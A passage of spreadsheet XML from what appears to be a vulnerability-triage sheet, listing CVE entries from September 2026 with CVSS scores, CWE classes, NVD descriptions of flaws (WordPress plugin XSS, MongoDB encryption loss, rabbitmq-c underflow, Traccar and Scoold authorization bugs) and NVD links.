      <c r="M250" s="5" t="inlineStr"/>
      <c r="N250" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O250" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P250" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q250" s="5" t="inlineStr"/>
      <c r="R250" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S250" s="5" t="inlineStr">
        <is>
          <t>The HT Mega Addons for Elementor  WordPress plugin before 3.2.6 does not restrict the HTML tag name used to render the section headline in several of its widgets and blocks to a safe allowlist, allowing users with contributor-level access and above to store a crafted tag name that executes arbitrary JavaScript when the content is viewed, including by higher-privileged users who review or publish it.</t>
        </is>
      </c>
      <c r="T250" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86788</t>
        </is>
      </c>
    </row>
    <row r="251">
      <c r="A251" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B251" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C251" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-91011</t>
        </is>
      </c>
      <c r="D251" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="E251" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F251" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G251" s="5" t="inlineStr"/>
      <c r="H251" s="5" t="inlineStr"/>
      <c r="I251" s="5" t="inlineStr"/>
      <c r="J251" s="5" t="inlineStr"/>
      <c r="K251" s="5" t="inlineStr"/>
      <c r="L251" s="5" t="inlineStr"/>
      <c r="M251" s="5" t="inlineStr"/>
      <c r="N251" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O251" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P251" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q251" s="5" t="inlineStr"/>
      <c r="R251" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S251" s="5" t="inlineStr">
        <is>
          <t>The EWWW Image Optimizer WordPress plugin before 8.7.7 does not properly escape image attribute values when it rewrites page output, allowing authenticated users with author-level access and above to inject arbitrary JavaScript that is stored in published content and executes in the browser of any user who later views the affected page.</t>
        </is>
      </c>
      <c r="T251" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-91011</t>
        </is>
      </c>
    </row>
    <row r="252">
      <c r="A252" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B252" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C252" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92756</t>
        </is>
      </c>
      <c r="D252" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="E252" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F252" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G252" s="5" t="inlineStr"/>
      <c r="H252" s="5" t="inlineStr"/>
      <c r="I252" s="5" t="inlineStr"/>
      <c r="J252" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K252" s="5" t="inlineStr"/>
      <c r="L252" s="5" t="inlineStr"/>
      <c r="M252" s="5" t="inlineStr"/>
      <c r="N252" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O252" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P252" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q252" s="5" t="inlineStr"/>
      <c r="R252" s="5" t="inlineStr">
        <is>
          <t>CWE-311</t>
        </is>
      </c>
      <c r="S252" s="5" t="inlineStr">
        <is>
          <t>Applications built on MongoDB Entity Framework Core Provider which combine independent encryption settings and this provider's encryption settings may silently lose TLS and schema-map settings leading to protected fields being stored unencrypted in the database.</t>
        </is>
      </c>
      <c r="T252" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92756</t>
        </is>
      </c>
    </row>
    <row r="253">
      <c r="A253" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B253" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C253" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92757</t>
        </is>
      </c>
      <c r="D253" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="E253" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F253" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G253" s="5" t="inlineStr"/>
      <c r="H253" s="5" t="inlineStr"/>
      <c r="I253" s="5" t="inlineStr"/>
      <c r="J253" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K253" s="5" t="inlineStr"/>
      <c r="L253" s="5" t="inlineStr"/>
      <c r="M253" s="5" t="inlineStr"/>
      <c r="N253" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O253" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P253" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q253" s="5" t="inlineStr"/>
      <c r="R253" s="5" t="inlineStr">
        <is>
          <t>CWE-311</t>
        </is>
      </c>
      <c r="S253" s="5" t="inlineStr">
        <is>
          <t>Applications built on MongoDB Entity Framework Core Provider which place a database name in the connection string may inadvertently disable field level encryption.</t>
        </is>
      </c>
      <c r="T253" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92757</t>
        </is>
      </c>
    </row>
    <row r="254">
      <c r="A254" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B254" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C254" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-25261</t>
        </is>
      </c>
      <c r="D254" s="5" t="n">
        <v>6.7</v>
      </c>
      <c r="E254" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F254" s="5" t="inlineStr">
        <is>
          <t>product-security@qualcomm.com</t>
        </is>
      </c>
      <c r="G254" s="5" t="inlineStr"/>
      <c r="H254" s="5" t="inlineStr"/>
      <c r="I254" s="5" t="inlineStr"/>
      <c r="J254" s="5" t="inlineStr"/>
      <c r="K254" s="5" t="inlineStr"/>
      <c r="L254" s="5" t="inlineStr"/>
      <c r="M254" s="5" t="inlineStr"/>
      <c r="N254" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O254" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P254" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q254" s="5" t="inlineStr"/>
      <c r="R254" s="5" t="inlineStr">
        <is>
          <t>CWE-822</t>
        </is>
      </c>
      <c r="S254" s="5" t="inlineStr">
        <is>
          <t>Memory corruption while processing rear sensor IOCTL calls.</t>
        </is>
      </c>
      <c r="T254" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-25261</t>
        </is>
      </c>
    </row>
    <row r="255">
      <c r="A255" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B255" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C255" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-44235</t>
        </is>
      </c>
      <c r="D255" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E255" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F255" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G255" s="5" t="inlineStr"/>
      <c r="H255" s="5" t="inlineStr"/>
      <c r="I255" s="5" t="inlineStr"/>
      <c r="J255" s="5" t="inlineStr"/>
      <c r="K255" s="5" t="inlineStr"/>
      <c r="L255" s="5" t="inlineStr"/>
      <c r="M255" s="5" t="inlineStr"/>
      <c r="N255" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O255" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P255" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q255" s="5" t="inlineStr"/>
      <c r="R255" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-191</t>
        </is>
      </c>
      <c r="S255" s="5" t="inlineStr">
        <is>
          <t>rabbitmq-c is a C-language AMQP client library for RabbitMQ. Prior to 0.16.0, a malicious AMQP server can send an undersized HEADER or METHOD frame during client login and cause unsigned size_t underflow in amqp_handle_input() in librabbitmq/amqp_connection.c. The parser subtracts HEADER_SIZE, fixed per-frame fields, and FOOTER_SIZE from state-&gt;target_size without first checking the minimum frame length. The wrapped encoded.len value is passed through amqp_decode_properties() to amqp_decode_table_internal(), where it defeats bounds checks and causes an out-of-bounds read and process crash. An on-path attacker can also trigger the issue when AMQP traffic is not protected by TLS with certificate validation. The demonstrated impact is denial of service, with no reliable memory disclosure or code execution shown. This issue is fixed in version 0.16.0.</t>
        </is>
      </c>
      <c r="T255" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-44235</t>
        </is>
      </c>
    </row>
    <row r="256">
      <c r="A256" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B256" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C256" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52852</t>
        </is>
      </c>
      <c r="D256" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E256" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F256" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G256" s="5" t="inlineStr"/>
      <c r="H256" s="5" t="inlineStr"/>
      <c r="I256" s="5" t="inlineStr"/>
      <c r="J256" s="5" t="inlineStr"/>
      <c r="K256" s="5" t="inlineStr"/>
      <c r="L256" s="5" t="inlineStr"/>
      <c r="M256" s="5" t="inlineStr"/>
      <c r="N256" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O256" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P256" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q256" s="5" t="inlineStr"/>
      <c r="R256" s="5" t="inlineStr">
        <is>
          <t>CWE-674</t>
        </is>
      </c>
      <c r="S256" s="5" t="inlineStr">
        <is>
          <t>Traccar is an open source GPS tracking system. Prior to 6.14.0, an authenticated user with permission to manage groups and request reports can create a cyclic group-parent hierarchy and request a trips or stops report for a device in that hierarchy. org.traccar.api.resource.GroupResource permits the parent cycle, while org.traccar.helper.model.AttributeUtil.lookup follows group parents without cycle detection, a visited set, or a depth limit. The storage-backed lookup reached through TripsConfig. and ReportUtils.slowTripsAndStops never terminates, pins a Jetty worker at high CPU after the client disconnects, and can exhaust the web/API worker pool when requests are repeated. The position-ingestion cache-backed path is not part of the confirmed affected scope. This issue is fixed in 6.14.0.</t>
        </is>
      </c>
      <c r="T256" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52852</t>
        </is>
      </c>
    </row>
    <row r="257">
      <c r="A257" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B257" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C257" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54648</t>
        </is>
      </c>
      <c r="D257" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E257" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F257" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G257" s="5" t="inlineStr"/>
      <c r="H257" s="5" t="inlineStr"/>
      <c r="I257" s="5" t="inlineStr"/>
      <c r="J257" s="5" t="inlineStr"/>
      <c r="K257" s="5" t="inlineStr"/>
      <c r="L257" s="5" t="inlineStr"/>
      <c r="M257" s="5" t="inlineStr"/>
      <c r="N257" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O257" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P257" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q257" s="5" t="inlineStr"/>
      <c r="R257" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S257" s="5" t="inlineStr">
        <is>
          <t>CubeCart is an ecommerce software solution. Prior to 6.7.5, the GDPR tools in admin/sources/customers.gdpr.inc.php rely on page-level CC_PERM_READ access and do not require CC_PERM_DELETE for the purge, no_order_purge, or delete_guests commands. An authenticated administrator with read-only customer privileges can invoke these backend actions directly to bypass interface restrictions and irreversibly delete customer records, accounts without orders, or guest accounts, compromising data integrity and availability. This issue is fixed in version 6.7.5.</t>
        </is>
      </c>
      <c r="T257" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54648</t>
        </is>
      </c>
    </row>
    <row r="258">
      <c r="A258" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B258" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C258" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54676</t>
        </is>
      </c>
      <c r="D258" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E258" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F258" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G258" s="5" t="inlineStr"/>
      <c r="H258" s="5" t="inlineStr"/>
      <c r="I258" s="5" t="inlineStr"/>
      <c r="J258" s="5" t="inlineStr"/>
      <c r="K258" s="5" t="inlineStr"/>
      <c r="L258" s="5" t="inlineStr"/>
      <c r="M258" s="5" t="inlineStr"/>
      <c r="N258" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O258" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P258" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q258" s="5" t="inlineStr"/>
      <c r="R258" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S258" s="5" t="inlineStr">
        <is>
          <t>Scoold is a Q&amp;A and a knowledge sharing platform for teams. Prior to 1.69.0, users with personal API tokens can retrieve replies from questions in private spaces they cannot access because src/main/java/com/erudika/scoold/api/ApiController.java in ApiController.getPostReplies() does not apply canAccessSpace before returning data from GET /api/posts/{id}/answers. The issue is reachable when scoold.api_user_access_enabled and scoold.api_enabled are true and a token holder knows or enumerates a private question identifier. Under those conditions, the question endpoint can deny access while the answers endpoint returns the private reply bodies, exposing confidential team or project discussions. This issue is fixed in version 1.69.0.</t>
        </is>
      </c>
      <c r="T258" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54676</t>
        </is>
      </c>
    </row>
    <row r="259">
      <c r="A259" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B259" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C259" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54677</t>
        </is>
      </c>
      <c r="D259" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E259" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F259" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G259" s="5" t="inlineStr"/>
      <c r="H259" s="5" t="inlineStr"/>
      <c r="I259" s="5" t="inlineStr"/>
      <c r="J259" s="5" t="inlineStr"/>
      <c r="K259" s="5" t="inlineStr"/>
      <c r="L259" s="5" t="inlineStr"/>
      <c r="M259" s="5" t="inlineStr"/>
      <c r="N259" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O259" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P259" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q259" s="5" t="inlineStr"/>
      <c r="R259" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S259" s="5" t="inlineStr">
        <is>
          <t>Scoold is a Q&amp;A and a knowledge sharing platform for teams. Prior to 1.69.0, authenticated users who are not members of a private space can create content in questions belonging to that space because src/main/java/com/erudika/scoold/controllers/QuestionController.java in QuestionController.reply() and src/main/java/com/erudika/scoold/controllers/CommentController.java in CommentController.createAjax() do not apply the canAccessSpace authorization check used by the question read path. With scoold.is_default_space_public set to false and private spaces in use, a user with a valid session and a known or enumerable question identifier can send requests to POST /question/{id} and POST /comment, causing replies and comments to be stored in a thread the user cannot read. This permits unauthorized modification of private discussions and can trigger notifications that reveal the existence or metadata of private activity. This issue is fixed in version 1.69.0.</t>
        </is>
      </c>
      <c r="T259" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54677</t>
        </is>
      </c>
    </row>
    <row r="260">
      <c r="A260" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B260" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C260" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66572</t>
        </is>
      </c>
      <c r="D260" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E260" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F260" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G260" s="5" t="inlineStr"/>
      <c r="H260" s="5" t="inlineStr"/>
      <c r="I260" s="5" t="inlineStr"/>
      <c r="J260" s="5" t="inlineStr"/>
      <c r="K260" s="5" t="inlineStr"/>
      <c r="L260" s="5" t="inlineStr"/>
      <c r="M260" s="5" t="inlineStr"/>
      <c r="N260" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O260" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P260" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q260" s="5" t="inlineStr"/>
      <c r="R260" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S260" s="5" t="inlineStr">
        <is>
          <t>Contributor Cross Site Scripting (XSS) in JetBlog &lt;= 2.4.10 versions.</t>
        </is>
      </c>
      <c r="T260" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66572</t>
        </is>
      </c>
    </row>
    <row r="261">
      <c r="A261" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B261" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C261" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66573</t>
        </is>
      </c>
      <c r="D261" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E261" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F261" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G261" s="5" t="inlineStr"/>
      <c r="H261" s="5" t="inlineStr"/>
      <c r="I261" s="5" t="inlineStr"/>
      <c r="J261" s="5" t="inlineStr"/>
      <c r="K261" s="5" t="inlineStr"/>
      <c r="L261" s="5" t="inlineStr"/>
      <c r="M261" s="5" t="inlineStr"/>
      <c r="N261" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O261" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P261" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q261" s="5" t="inlineStr"/>
      <c r="R261" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S261" s="5" t="inlineStr">
        <is>
          <t>Contributor Cross Site Scripting (XSS) in JetTabs &lt;= 2.3.3.1 versions.</t>
        </is>
      </c>
      <c r="T261" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66573</t>
        </is>
      </c>
    </row>
    <row r="262">
      <c r="A262" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B262" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C262" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66574</t>
        </is>
      </c>
      <c r="D262" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E262" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F262" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G262" s="5" t="inlineStr"/>
      <c r="H262" s="5" t="inlineStr"/>
      <c r="I262" s="5" t="inlineStr"/>
      <c r="J262" s="5" t="inlineStr"/>
      <c r="K262" s="5" t="inlineStr"/>
      <c r="L262" s="5" t="inlineStr"/>
      <c r="M262" s="5" t="inlineStr"/>
      <c r="N262" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O262" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P262" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q262" s="5" t="inlineStr"/>
      <c r="R262" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S262" s="5" t="inlineStr">
        <is>
          <t>Contributor Cross Site Scripting (XSS) in Element Pack Elementor Addons &lt;= 8.8.3 versions.</t>
        </is>
      </c>
      <c r="T262" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66574</t>
        </is>
      </c>
    </row>
    <row r="263">
      <c r="A263" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B263" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C263" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66576</t>
        </is>
      </c>
      <c r="D263" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E263" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F263" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G263" s="5" t="inlineStr"/>
      <c r="H263" s="5" t="inlineStr"/>
      <c r="I263" s="5" t="inlineStr"/>
      <c r="J263" s="5" t="inlineStr"/>
      <c r="K263" s="5" t="inlineStr"/>
      <c r="L263" s="5" t="inlineStr"/>
      <c r="M263" s="5" t="inlineStr"/>
      <c r="N263" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O263" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P263" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q263" s="5" t="inlineStr"/>
      <c r="R263" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S263" s="5" t="inlineStr">
        <is>
          <t>Contributor Cross Site Scripting (XSS) in JetBlocks For Elementor &lt;= 1.5.2 versions.</t>
        </is>
      </c>
      <c r="T263" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66576</t>
        </is>
      </c>
    </row>
    <row r="264">
      <c r="A264" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B264" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C264" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66577</t>
        </is>
      </c>
      <c r="D264" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E264" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F264" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G264" s="5" t="inlineStr"/>
      <c r="H264" s="5" t="inlineStr"/>
      <c r="I264" s="5" t="inlineStr"/>
      <c r="J264" s="5" t="inlineStr"/>
      <c r="K264" s="5" t="inlineStr"/>
      <c r="L264" s="5" t="inlineStr"/>
      <c r="M264" s="5" t="inlineStr"/>
      <c r="N264" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O264" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P264" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q264" s="5" t="inlineStr"/>
      <c r="R264" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S264" s="5" t="inlineStr">
        <is>
          <t>Contributor Cross Site Scripting (XSS) in JetSearch &lt;= 3.6.3 versions.</t>
        </is>
      </c>
      <c r="T264" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66577</t>
        </is>
      </c>
    </row>
    <row r="265">
      <c r="A265" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B265" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C265" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66578</t>
        </is>
      </c>
      <c r="D265" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E265" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F265" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G265" s="5" t="inlineStr"/>
      <c r="H265" s="5" t="inlineStr"/>
      <c r="I265" s="5" t="inlineStr"/>
      <c r="J265" s="5" t="inlineStr"/>
      <c r="K265" s="5" t="inlineStr"/>
      <c r="L265" s="5" t="inlineStr"/>
      <c r="M265" s="5" t="inlineStr"/>
      <c r="N265" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O265" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P265" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q265" s="5" t="inlineStr"/>
      <c r="R265" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S265" s="5" t="inlineStr">
        <is>
          <t>Contributor Cross Site Scripting (XSS) in PropertyHive &lt;= 2.2.6 versions.</t>
        </is>
      </c>
      <c r="T265" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66578</t>
        </is>
      </c>
    </row>
    <row r="266">
      <c r="A266" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B266" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C266" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66579</t>
        </is>
      </c>
      <c r="D266" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E266" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F266" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G266" s="5" t="inlineStr"/>
      <c r="H266" s="5" t="inlineStr"/>
      <c r="I266" s="5" t="inlineStr"/>
      <c r="J266" s="5" t="inlineStr"/>
      <c r="K266" s="5" t="inlineStr"/>
      <c r="L266" s="5" t="inlineStr"/>
      <c r="M266" s="5" t="inlineStr"/>
      <c r="N266" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O266" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P266" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
